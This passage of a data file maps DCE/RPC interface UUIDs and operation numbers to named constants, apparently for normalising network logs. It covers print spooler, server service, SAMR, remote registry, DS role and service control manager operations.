12345678-1234-abcd-ef00-0123456789ab:84 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_DRIVER_EX
12345678-1234-abcd-ef00-0123456789ab:85 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PER_MACHINE_CONNECTION
12345678-1234-abcd-ef00-0123456789ab:86 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PER_MACHINE_CONNECTION
12345678-1234-abcd-ef00-0123456789ab:87 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PER_MACHINE_CONNECTIONS
12345678-1234-abcd-ef00-0123456789ab:88 XDM_CONST.DCERPC_OPERATION_RPC_XCV_DATA
12345678-1234-abcd-ef00-0123456789ab:89 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER_DRIVER_EX
12345678-1234-abcd-ef00-0123456789ab:90 XDM_CONST.DCERPC_OPERATION_RPC_SPL_OPEN_PRINTER
12345678-1234-abcd-ef00-0123456789ab:91 XDM_CONST.DCERPC_OPERATION_RPC_GET_SPOOL_FILE_INFO
12345678-1234-abcd-ef00-0123456789ab:92 XDM_CONST.DCERPC_OPERATION_RPC_COMMIT_SPOOL_DATA
12345678-1234-abcd-ef00-0123456789ab:93 XDM_CONST.DCERPC_OPERATION_RPC_CLOSE_SPOOL_FILE_HANDLE
12345678-1234-abcd-ef00-0123456789ab:94 XDM_CONST.DCERPC_OPERATION_RPC_FLUSH_PRINTER
12345678-1234-abcd-ef00-0123456789ab:95 XDM_CONST.DCERPC_OPERATION_RPC_SEND_RECV_BIDI_DATA
12345678-1234-abcd-ef00-0123456789ab:96 XDM_CONST.DCERPC_OPERATION_RPC_ADD_DRIVER_CATALOG
12345678-1234-abcd-ef00-0123456789ab:97 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER_CONNECTION2
12345678-1234-abcd-ef00-0123456789ab:98 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_CONNECTION2
12345678-1234-abcd-ef00-0123456789ab:99 XDM_CONST.DCERPC_OPERATION_RPC_INSTALL_PRINTER_DRIVER_FROM_PACKAGE
12345678-1234-abcd-ef00-0123456789ab:100 XDM_CONST.DCERPC_OPERATION_RPC_UPLOAD_PRINTER_DRIVER_PACKAGE
12345678-1234-abcd-ef00-0123456789ab:101 XDM_CONST.DCERPC_OPERATION_RPC_GET_CORE_PRINTER_DRIVERS
12345678-1234-abcd-ef00-0123456789ab:102 XDM_CONST.DCERPC_OPERATION_RPC_CORE_PRINTER_DRIVER_INSTALLED
12345678-1234-abcd-ef00-0123456789ab:103 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DRIVER_PACKAGE_PATH
12345678-1234-abcd-ef00-0123456789ab:104 XDM_CONST.DCERPC_OPERATION_RPC_REPORT_JOB_PROCESSING_PROGRESS
4b324fc8-1670-01d3-1278-5a47bf6ee188:0 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_ENUM
4b324fc8-1670-01d3-1278-5a47bf6ee188:1 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_GET_INFO
4b324fc8-1670-01d3-1278-5a47bf6ee188:2 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_CONTROL
4b324fc8-1670-01d3-1278-5a47bf6ee188:3 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_Q_ENUM
4b324fc8-1670-01d3-1278-5a47bf6ee188:4 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_Q_GET_INFO
4b324fc8-1670-01d3-1278-5a47bf6ee188:5 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_Q_SET_INFO
4b324fc8-1670-01d3-1278-5a47bf6ee188:6 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_Q_PURGE
4b324fc8-1670-01d3-1278-5a47bf6ee188:7 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_Q_PURGE_SELF
4b324fc8-1670-01d3-1278-5a47bf6ee188:8 XDM_CONST.DCERPC_OPERATION_NETR_CONNECTION_ENUM
4b324fc8-1670-01d3-1278-5a47bf6ee188:9 XDM_CONST.DCERPC_OPERATION_NETR_FILE_ENUM
4b324fc8-1670-01d3-1278-5a47bf6ee188:10 XDM_CONST.DCERPC_OPERATION_NETR_FILE_GET_INFO
4b324fc8-1670-01d3-1278-5a47bf6ee188:11 XDM_CONST.DCERPC_OPERATION_NETR_FILE_CLOSE
4b324fc8-1670-01d3-1278-5a47bf6ee188:12 XDM_CONST.DCERPC_OPERATION_NETR_SESSION_ENUM
4b324fc8-1670-01d3-1278-5a47bf6ee188:13 XDM_CONST.DCERPC_OPERATION_NETR_SESSION_DEL
4b324fc8-1670-01d3-1278-5a47bf6ee188:14 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_ADD
4b324fc8-1670-01d3-1278-5a47bf6ee188:15 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_ENUM
4b324fc8-1670-01d3-1278-5a47bf6ee188:16 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_GET_INFO
4b324fc8-1670-01d3-1278-5a47bf6ee188:17 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_SET_INFO
4b324fc8-1670-01d3-1278-5a47bf6ee188:18 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_DEL
4b324fc8-1670-01d3-1278-5a47bf6ee188:19 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_DEL_STICKY
4b324fc8-1670-01d3-1278-5a47bf6ee188:20 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_CHECK
4b324fc8-1670-01d3-1278-5a47bf6ee188:21 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_GET_INFO
4b324fc8-1670-01d3-1278-5a47bf6ee188:22 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_SET_INFO
4b324fc8-1670-01d3-1278-5a47bf6ee188:23 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_DISK_ENUM
4b324fc8-1670-01d3-1278-5a47bf6ee188:24 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_STATISTICS_GET
4b324fc8-1670-01d3-1278-5a47bf6ee188:25 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRANSPORT_ADD
4b324fc8-1670-01d3-1278-5a47bf6ee188:26 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRANSPORT_ENUM
4b324fc8-1670-01d3-1278-5a47bf6ee188:27 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRANSPORT_DEL
4b324fc8-1670-01d3-1278-5a47bf6ee188:28 XDM_CONST.DCERPC_OPERATION_NETR_REMOTE_TOD
4b324fc8-1670-01d3-1278-5a47bf6ee188:29 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_SET_SERVICE_BITS
4b324fc8-1670-01d3-1278-5a47bf6ee188:30 XDM_CONST.DCERPC_OPERATION_NETPR_PATH_TYPE
4b324fc8-1670-01d3-1278-5a47bf6ee188:31 XDM_CONST.DCERPC_OPERATION_NETPR_PATH_CANONICALIZE
4b324fc8-1670-01d3-1278-5a47bf6ee188:32 XDM_CONST.DCERPC_OPERATION_NETPR_PATH_COMPARE
4b324fc8-1670-01d3-1278-5a47bf6ee188:33 XDM_CONST.DCERPC_OPERATION_NETPR_NAME_VALIDATE
4b324fc8-1670-01d3-1278-5a47bf6ee188:34 XDM_CONST.DCERPC_OPERATION_NETPR_NAME_CANONICALIZE
4b324fc8-1670-01d3-1278-5a47bf6ee188:35 XDM_CONST.DCERPC_OPERATION_NETPR_NAME_COMPARE
4b324fc8-1670-01d3-1278-5a47bf6ee188:36 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_ENUM_STICKY
4b324fc8-1670-01d3-1278-5a47bf6ee188:37 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_DEL_START
4b324fc8-1670-01d3-1278-5a47bf6ee188:38 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_DEL_COMMIT
4b324fc8-1670-01d3-1278-5a47bf6ee188:39 XDM_CONST.DCERPC_OPERATION_NETRP_GET_FILE_SECURITY
4b324fc8-1670-01d3-1278-5a47bf6ee188:40 XDM_CONST.DCERPC_OPERATION_NETRP_SET_FILE_SECURITY
4b324fc8-1670-01d3-1278-5a47bf6ee188:41 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRANSPORT_ADD_EX
4b324fc8-1670-01d3-1278-5a47bf6ee188:42 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_SET_SERVICE_BITS_EX
4b324fc8-1670-01d3-1278-5a47bf6ee188:43 XDM_CONST.DCERPC_OPERATION_NETR_DFS_GET_VERSION
4b324fc8-1670-01d3-1278-5a47bf6ee188:44 XDM_CONST.DCERPC_OPERATION_NETR_DFS_CREATE_LOCAL_PARTITION
4b324fc8-1670-01d3-1278-5a47bf6ee188:45 XDM_CONST.DCERPC_OPERATION_NETR_DFS_DELETE_LOCAL_PARTITION
4b324fc8-1670-01d3-1278-5a47bf6ee188:46 XDM_CONST.DCERPC_OPERATION_NETR_DFS_SET_LOCAL_VOLUME_STATE
4b324fc8-1670-01d3-1278-5a47bf6ee188:47 XDM_CONST.DCERPC_OPERATION_NETR_DFS_SET_SERVER_INFO
4b324fc8-1670-01d3-1278-5a47bf6ee188:48 XDM_CONST.DCERPC_OPERATION_NETR_DFS_CREATE_EXIT_POINT
4b324fc8-1670-01d3-1278-5a47bf6ee188:49 XDM_CONST.DCERPC_OPERATION_NETR_DFS_DELETE_EXIT_POINT
4b324fc8-1670-01d3-1278-5a47bf6ee188:50 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MODIFY_PREFIX
4b324fc8-1670-01d3-1278-5a47bf6ee188:51 XDM_CONST.DCERPC_OPERATION_NETR_DFS_FIX_LOCAL_VOLUME
4b324fc8-1670-01d3-1278-5a47bf6ee188:52 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MANAGER_REPORT_SITE_INFO
4b324fc8-1670-01d3-1278-5a47bf6ee188:53 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRANSPORT_DEL_EX
4b324fc8-1670-01d3-1278-5a47bf6ee188:55 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_ALIAS_ENUM
4b324fc8-1670-01d3-1278-5a47bf6ee188:56 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_ALIAS_DEL
4b324fc8-1670-01d3-1278-5a47bf6ee188:57 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_DEL_EX
12345778-1234-abcd-ef00-0123456789ac:0 XDM_CONST.DCERPC_OPERATION_SAMR_CONNECT
12345778-1234-abcd-ef00-0123456789ac:1 XDM_CONST.DCERPC_OPERATION_SAMR_CLOSE_HANDLE
12345778-1234-abcd-ef00-0123456789ac:2 XDM_CONST.DCERPC_OPERATION_SAMR_SET_SECURITY_OBJECT
12345778-1234-abcd-ef00-0123456789ac:3 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_SECURITY_OBJECT
12345778-1234-abcd-ef00-0123456789ac:4 XDM_CONST.DCERPC_OPERATION_SAMR_SHUTDOWN_SAM_SERVER
12345778-1234-abcd-ef00-0123456789ac:5 XDM_CONST.DCERPC_OPERATION_SAMR_LOOKUP_DOMAIN_IN_SAM_SERVER
12345778-1234-abcd-ef00-0123456789ac:6 XDM_CONST.DCERPC_OPERATION_SAMR_ENUMERATE_DOMAINS_IN_SAM_SERVER
12345778-1234-abcd-ef00-0123456789ac:7 XDM_CONST.DCERPC_OPERATION_SAMR_OPEN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:8 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:9 XDM_CONST.DCERPC_OPERATION_SAMR_SET_INFORMATION_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:10 XDM_CONST.DCERPC_OPERATION_SAMR_CREATE_GROUP_IN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:11 XDM_CONST.DCERPC_OPERATION_SAMR_ENUMERATE_GROUPS_IN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:12 XDM_CONST.DCERPC_OPERATION_SAMR_CREATE_USER_IN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:13 XDM_CONST.DCERPC_OPERATION_SAMR_ENUMERATE_USERS_IN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:14 XDM_CONST.DCERPC_OPERATION_SAMR_CREATE_ALIAS_IN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:15 XDM_CONST.DCERPC_OPERATION_SAMR_ENUMERATE_ALIASES_IN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:16 XDM_CONST.DCERPC_OPERATION_SAMR_GET_ALIAS_MEMBERSHIP
12345778-1234-abcd-ef00-0123456789ac:17 XDM_CONST.DCERPC_OPERATION_SAMR_LOOKUP_NAMES_IN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:18 XDM_CONST.DCERPC_OPERATION_SAMR_LOOKUP_IDS_IN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:19 XDM_CONST.DCERPC_OPERATION_SAMR_OPEN_GROUP
12345778-1234-abcd-ef00-0123456789ac:20 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_GROUP
12345778-1234-abcd-ef00-0123456789ac:21 XDM_CONST.DCERPC_OPERATION_SAMR_SET_INFORMATION_GROUP
12345778-1234-abcd-ef00-0123456789ac:22 XDM_CONST.DCERPC_OPERATION_SAMR_ADD_MEMBER_TO_GROUP
12345778-1234-abcd-ef00-0123456789ac:23 XDM_CONST.DCERPC_OPERATION_SAMR_DELETE_GROUP
12345778-1234-abcd-ef00-0123456789ac:24 XDM_CONST.DCERPC_OPERATION_SAMR_REMOVE_MEMBER_FROM_GROUP
12345778-1234-abcd-ef00-0123456789ac:25 XDM_CONST.DCERPC_OPERATION_SAMR_GET_MEMBERS_IN_GROUP
12345778-1234-abcd-ef00-0123456789ac:26 XDM_CONST.DCERPC_OPERATION_SAMR_SET_MEMBER_ATTRIBUTES_OF_GROUP
12345778-1234-abcd-ef00-0123456789ac:27 XDM_CONST.DCERPC_OPERATION_SAMR_OPEN_ALIAS
12345778-1234-abcd-ef00-0123456789ac:28 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_ALIAS
12345778-1234-abcd-ef00-0123456789ac:29 XDM_CONST.DCERPC_OPERATION_SAMR_SET_INFORMATION_ALIAS
12345778-1234-abcd-ef00-0123456789ac:30 XDM_CONST.DCERPC_OPERATION_SAMR_DELETE_ALIAS
12345778-1234-abcd-ef00-0123456789ac:31 XDM_CONST.DCERPC_OPERATION_SAMR_ADD_MEMBER_TO_ALIAS
12345778-1234-abcd-ef00-0123456789ac:32 XDM_CONST.DCERPC_OPERATION_SAMR_REMOVE_MEMBER_FROM_ALIAS
12345778-1234-abcd-ef00-0123456789ac:33 XDM_CONST.DCERPC_OPERATION_SAMR_GET_MEMBERS_IN_ALIAS
12345778-1234-abcd-ef00-0123456789ac:34 XDM_CONST.DCERPC_OPERATION_SAMR_OPEN_USER
12345778-1234-abcd-ef00-0123456789ac:35 XDM_CONST.DCERPC_OPERATION_SAMR_DELETE_USER
12345778-1234-abcd-ef00-0123456789ac:36 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_USER
12345778-1234-abcd-ef00-0123456789ac:37 XDM_CONST.DCERPC_OPERATION_SAMR_SET_INFORMATION_USER
12345778-1234-abcd-ef00-0123456789ac:38 XDM_CONST.DCERPC_OPERATION_SAMR_CHANGE_PASSWORD_USER
12345778-1234-abcd-ef00-0123456789ac:39 XDM_CONST.DCERPC_OPERATION_SAMR_GET_GROUPS_FOR_USER
12345778-1234-abcd-ef00-0123456789ac:40 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_DISPLAY_INFORMATION
12345778-1234-abcd-ef00-0123456789ac:41 XDM_CONST.DCERPC_OPERATION_SAMR_GET_DISPLAY_ENUMERATION_INDEX
12345778-1234-abcd-ef00-0123456789ac:42 XDM_CONST.DCERPC_OPERATION_SAMR_TEST_PRIVATE_FUNCTIONS_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:43 XDM_CONST.DCERPC_OPERATION_SAMR_TEST_PRIVATE_FUNCTIONS_USER
12345778-1234-abcd-ef00-0123456789ac:44 XDM_CONST.DCERPC_OPERATION_SAMR_GET_USER_DOMAIN_PASSWORD_INFORMATION
12345778-1234-abcd-ef00-0123456789ac:45 XDM_CONST.DCERPC_OPERATION_SAMR_REMOVE_MEMBER_FROM_FOREIGN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:46 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_DOMAIN2
12345778-1234-abcd-ef00-0123456789ac:47 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_USER2
12345778-1234-abcd-ef00-0123456789ac:48 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_DISPLAY_INFORMATION2
12345778-1234-abcd-ef00-0123456789ac:49 XDM_CONST.DCERPC_OPERATION_SAMR_GET_DISPLAY_ENUMERATION_INDEX2
12345778-1234-abcd-ef00-0123456789ac:50 XDM_CONST.DCERPC_OPERATION_SAMR_CREATE_USER2_IN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:51 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_DISPLAY_INFORMATION3
12345778-1234-abcd-ef00-0123456789ac:52 XDM_CONST.DCERPC_OPERATION_SAMR_ADD_MULTIPLE_MEMBERS_TO_ALIAS
12345778-1234-abcd-ef00-0123456789ac:53 XDM_CONST.DCERPC_OPERATION_SAMR_REMOVE_MULTIPLE_MEMBERS_FROM_ALIAS
12345778-1234-abcd-ef00-0123456789ac:54 XDM_CONST.DCERPC_OPERATION_SAMR_OEM_CHANGE_PASSWORD_USER2
12345778-1234-abcd-ef00-0123456789ac:55 XDM_CONST.DCERPC_OPERATION_SAMR_UNICODE_CHANGE_PASSWORD_USER2
12345778-1234-abcd-ef00-0123456789ac:56 XDM_CONST.DCERPC_OPERATION_SAMR_GET_DOMAIN_PASSWORD_INFORMATION
12345778-1234-abcd-ef00-0123456789ac:57 XDM_CONST.DCERPC_OPERATION_SAMR_CONNECT2
12345778-1234-abcd-ef00-0123456789ac:58 XDM_CONST.DCERPC_OPERATION_SAMR_SET_INFORMATION_USER2
12345778-1234-abcd-ef00-0123456789ac:59 XDM_CONST.DCERPC_OPERATION_SAMR_SET_BOOT_KEY_INFORMATION
12345778-1234-abcd-ef00-0123456789ac:60 XDM_CONST.DCERPC_OPERATION_SAMR_GET_BOOT_KEY_INFORMATION
12345778-1234-abcd-ef00-0123456789ac:61 XDM_CONST.DCERPC_OPERATION_SAMR_CONNECT3
12345778-1234-abcd-ef00-0123456789ac:62 XDM_CONST.DCERPC_OPERATION_SAMR_CONNECT4
12345778-1234-abcd-ef00-0123456789ac:63 XDM_CONST.DCERPC_OPERATION_SAMR_UNICODE_CHANGE_PASSWORD_USER3
12345778-1234-abcd-ef00-0123456789ac:64 XDM_CONST.DCERPC_OPERATION_SAMR_CONNECT5
12345778-1234-abcd-ef00-0123456789ac:65 XDM_CONST.DCERPC_OPERATION_SAMR_RID_TO_SID
12345778-1234-abcd-ef00-0123456789ac:66 XDM_CONST.DCERPC_OPERATION_SAMR_SET_DSRM_PASSWORD
12345778-1234-abcd-ef00-0123456789ac:67 XDM_CONST.DCERPC_OPERATION_SAMR_VALIDATE_PASSWORD
12345778-1234-abcd-ef00-0123456789ac:68 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_LOCALIZABLE_ACCOUNTS_IN_DOMAIN
12345778-1234-abcd-ef00-0123456789ac:69 XDM_CONST.DCERPC_OPERATION_SAMR_PERFORM_GENERIC_OPERATION
338cd001-2244-31f1-aaaa-900038001003:0 XDM_CONST.DCERPC_OPERATION_OPEN_CLASSES_ROOT
338cd001-2244-31f1-aaaa-900038001003:1 XDM_CONST.DCERPC_OPERATION_OPEN_CURRENT_USER
338cd001-2244-31f1-aaaa-900038001003:2 XDM_CONST.DCERPC_OPERATION_OPEN_LOCAL_MACHINE
338cd001-2244-31f1-aaaa-900038001003:3 XDM_CONST.DCERPC_OPERATION_OPEN_PERFORMANCE_DATA
338cd001-2244-31f1-aaaa-900038001003:4 XDM_CONST.DCERPC_OPERATION_OPEN_USERS
338cd001-2244-31f1-aaaa-900038001003:5 XDM_CONST.DCERPC_OPERATION_BASE_REG_CLOSE_KEY
338cd001-2244-31f1-aaaa-900038001003:6 XDM_CONST.DCERPC_OPERATION_BASE_REG_CREATE_KEY
338cd001-2244-31f1-aaaa-900038001003:7 XDM_CONST.DCERPC_OPERATION_BASE_REG_DELETE_KEY
338cd001-2244-31f1-aaaa-900038001003:8 XDM_CONST.DCERPC_OPERATION_BASE_REG_DELETE_VALUE
338cd001-2244-31f1-aaaa-900038001003:9 XDM_CONST.DCERPC_OPERATION_BASE_REG_ENUM_KEY
338cd001-2244-31f1-aaaa-900038001003:10 XDM_CONST.DCERPC_OPERATION_BASE_REG_ENUM_VALUE
338cd001-2244-31f1-aaaa-900038001003:11 XDM_CONST.DCERPC_OPERATION_BASE_REG_FLUSH_KEY
338cd001-2244-31f1-aaaa-900038001003:12 XDM_CONST.DCERPC_OPERATION_BASE_REG_GET_KEY_SECURITY
338cd001-2244-31f1-aaaa-900038001003:13 XDM_CONST.DCERPC_OPERATION_BASE_REG_LOAD_KEY
338cd001-2244-31f1-aaaa-900038001003:14 XDM_CONST.DCERPC_OPERATION_BASE_REG_NOTIFY_CHANGE_KEY_VALUE
338cd001-2244-31f1-aaaa-900038001003:15 XDM_CONST.DCERPC_OPERATION_BASE_REG_OPEN_KEY
338cd001-2244-31f1-aaaa-900038001003:16 XDM_CONST.DCERPC_OPERATION_BASE_REG_QUERY_INFO_KEY
338cd001-2244-31f1-aaaa-900038001003:17 XDM_CONST.DCERPC_OPERATION_BASE_REG_QUERY_VALUE
338cd001-2244-31f1-aaaa-900038001003:18 XDM_CONST.DCERPC_OPERATION_BASE_REG_REPLACE_KEY
338cd001-2244-31f1-aaaa-900038001003:19 XDM_CONST.DCERPC_OPERATION_BASE_REG_RESTORE_KEY
338cd001-2244-31f1-aaaa-900038001003:20 XDM_CONST.DCERPC_OPERATION_BASE_REG_SAVE_KEY
338cd001-2244-31f1-aaaa-900038001003:21 XDM_CONST.DCERPC_OPERATION_BASE_REG_SET_KEY_SECURITY
338cd001-2244-31f1-aaaa-900038001003:22 XDM_CONST.DCERPC_OPERATION_BASE_REG_SET_VALUE
338cd001-2244-31f1-aaaa-900038001003:23 XDM_CONST.DCERPC_OPERATION_BASE_REG_UN_LOAD_KEY
338cd001-2244-31f1-aaaa-900038001003:24 XDM_CONST.DCERPC_OPERATION_BASE_INITIATE_SYSTEM_SHUTDOWN
338cd001-2244-31f1-aaaa-900038001003:25 XDM_CONST.DCERPC_OPERATION_BASE_ABORT_SYSTEM_SHUTDOWN
338cd001-2244-31f1-aaaa-900038001003:26 XDM_CONST.DCERPC_OPERATION_BASE_REG_GET_VERSION
338cd001-2244-31f1-aaaa-900038001003:27 XDM_CONST.DCERPC_OPERATION_OPEN_CURRENT_CONFIG
338cd001-2244-31f1-aaaa-900038001003:28 XDM_CONST.DCERPC_OPERATION_OPEN_DYN_DATA
338cd001-2244-31f1-aaaa-900038001003:29 XDM_CONST.DCERPC_OPERATION_BASE_REG_QUERY_MULTIPLE_VALUES
338cd001-2244-31f1-aaaa-900038001003:30 XDM_CONST.DCERPC_OPERATION_BASE_INITIATE_SYSTEM_SHUTDOWN_EX
338cd001-2244-31f1-aaaa-900038001003:31 XDM_CONST.DCERPC_OPERATION_BASE_REG_SAVE_KEY_EX
338cd001-2244-31f1-aaaa-900038001003:32 XDM_CONST.DCERPC_OPERATION_OPEN_PERFORMANCE_TEXT
338cd001-2244-31f1-aaaa-900038001003:33 XDM_CONST.DCERPC_OPERATION_OPEN_PERFORMANCE_NLS_TEXT
338cd001-2244-31f1-aaaa-900038001003:34 XDM_CONST.DCERPC_OPERATION_BASE_REG_QUERY_MULTIPLE_VALUES2
338cd001-2244-31f1-aaaa-900038001003:35 XDM_CONST.DCERPC_OPERATION_BASE_REG_DELETE_KEY_EX
3919286a-b10c-11d0-9ba8-00c04fd92ef5:0 XDM_CONST.DCERPC_OPERATION_DS_ROLER_GET_PRIMARY_DOMAIN_INFORMATION
3919286a-b10c-11d0-9ba8-00c04fd92ef5:1 XDM_CONST.DCERPC_OPERATION_DS_ROLER_DNS_NAME_TO_FLAT_NAME
3919286a-b10c-11d0-9ba8-00c04fd92ef5:2 XDM_CONST.DCERPC_OPERATION_DS_ROLER_DC_AS_DC
3919286a-b10c-11d0-9ba8-00c04fd92ef5:3 XDM_CONST.DCERPC_OPERATION_DS_ROLER_DC_AS_REPLICA
3919286a-b10c-11d0-9ba8-00c04fd92ef5:4 XDM_CONST.DCERPC_OPERATION_DS_ROLER_DEMOTE_DC
3919286a-b10c-11d0-9ba8-00c04fd92ef5:5 XDM_CONST.DCERPC_OPERATION_DS_ROLER_GET_DC_OPERATION_PROGRESS
3919286a-b10c-11d0-9ba8-00c04fd92ef5:6 XDM_CONST.DCERPC_OPERATION_DS_ROLER_GET_DC_OPERATION_RESULTS
3919286a-b10c-11d0-9ba8-00c04fd92ef5:7 XDM_CONST.DCERPC_OPERATION_DS_ROLER_CANCEL
3919286a-b10c-11d0-9ba8-00c04fd92ef5:8 XDM_CONST.DCERPC_OPERATION_DS_ROLER_SERVER_SAVE_STATE_FOR_UPGRADE
3919286a-b10c-11d0-9ba8-00c04fd92ef5:9 XDM_CONST.DCERPC_OPERATION_DS_ROLER_UPGRADE_DOWNLEVEL_SERVER
3919286a-b10c-11d0-9ba8-00c04fd92ef5:10 XDM_CONST.DCERPC_OPERATION_DS_ROLER_ABORT_DOWNLEVEL_SERVER_UPGRADE
367abb81-9844-35f1-ad32-98f038001003:0 XDM_CONST.DCERPC_OPERATION_CLOSE_SERVICE_HANDLE
367abb81-9844-35f1-ad32-98f038001003:1 XDM_CONST.DCERPC_OPERATION_CONTROL_SERVICE
367abb81-9844-35f1-ad32-98f038001003:2 XDM_CONST.DCERPC_OPERATION_DELETE_SERVICE
367abb81-9844-35f1-ad32-98f038001003:3 XDM_CONST.DCERPC_OPERATION_LOCK_SERVICE_DATABASE
367abb81-9844-35f1-ad32-98f038001003:4 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_OBJECT_SECURITY
367abb81-9844-35f1-ad32-98f038001003:5 XDM_CONST.DCERPC_OPERATION_SET_SERVICE_OBJECT_SECURITY
367abb81-9844-35f1-ad32-98f038001003:6 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_STATUS
367abb81-9844-35f1-ad32-98f038001003:7 XDM_CONST.DCERPC_OPERATION_SET_SERVICE_STATUS
367abb81-9844-35f1-ad32-98f038001003:8 XDM_CONST.DCERPC_OPERATION_UNLOCK_SERVICE_DATABASE
367abb81-9844-35f1-ad32-98f038001003:9 XDM_CONST.DCERPC_OPERATION_NOTIFY_BOOT_CONFIG_STATUS
367abb81-9844-35f1-ad32-98f038001003:10 XDM_CONST.DCERPC_OPERATION_SC_SET_SERVICE_BITS_W
367abb81-9844-35f1-ad32-98f038001003:11 XDM_CONST.DCERPC_OPERATION_CHANGE_SERVICE_CONFIG_W
367abb81-9844-35f1-ad32-98f038001003:12 XDM_CONST.DCERPC_OPERATION_CREATE_SERVICE_W
367abb81-9844-35f1-ad32-98f038001003:13 XDM_CONST.DCERPC_OPERATION_ENUM_DEPENDENT_SERVICES_W
367abb81-9844-35f1-ad32-98f038001003:14 XDM_CONST.DCERPC_OPERATION_ENUM_SERVICES_STATUS_W
367abb81-9844-35f1-ad32-98f038001003:15 XDM_CONST.DCERPC_OPERATION_OPEN_SC_MANAGER_W
367abb81-9844-35f1-ad32-98f038001003:16 XDM_CONST.DCERPC_OPERATION_OPEN_SERVICE_W
367abb81-9844-35f1-ad32-98f038001003:17 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_CONFIG_W
367abb81-9844-35f1-ad32-98f038001003:18 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_LOCK_STATUS_W
367abb81-9844-35f1-ad32-98f038001003:19 XDM_CONST.DCERPC_OPERATION_START_SERVICE_W
367abb81-9844-35f1-ad32-98f038001003:20 XDM_CONST.DCERPC_OPERATION_GET_SERVICE_DISPLAY_NAME_W
367abb81-9844-35f1-ad32-98f038001003:21 XDM_CONST.DCERPC_OPERATION_GET_SERVICE_KEY_NAME_W
367abb81-9844-35f1-ad32-98f038001003:22 XDM_CONST.DCERPC_OPERATION_SC_SET_SERVICE_BITS_A
367abb81-9844-35f1-ad32-98f038001003:23 XDM_CONST.DCERPC_OPERATION_CHANGE_SERVICE_CONFIG_A
367abb81-9844-35f1-ad32-98f038001003:24 XDM_CONST.DCERPC_OPERATION_CREATE_SERVICE_A
367abb81-9844-35f1-ad32-98f038001003:25 XDM_CONST.DCERPC_OPERATION_ENUM_DEPENDENT_SERVICES_A
367abb81-9844-35f1-ad32-98f038001003:26 XDM_CONST.DCERPC_OPERATION_ENUM_SERVICES_STATUS_A
367abb81-9844-35f1-ad32-98f038001003:27 XDM_CONST.DCERPC_OPERATION_OPEN_SC_MANAGER_A
367abb81-9844-35f1-ad32-98f038001003:28 XDM_CONST.DCERPC_OPERATION_OPEN_SERVICE_A
367abb81-9844-35f1-ad32-98f038001003:29 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_CONFIG_A
367abb81-9844-35f1-ad32-98f038001003:30 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_LOCK_STATUS_A
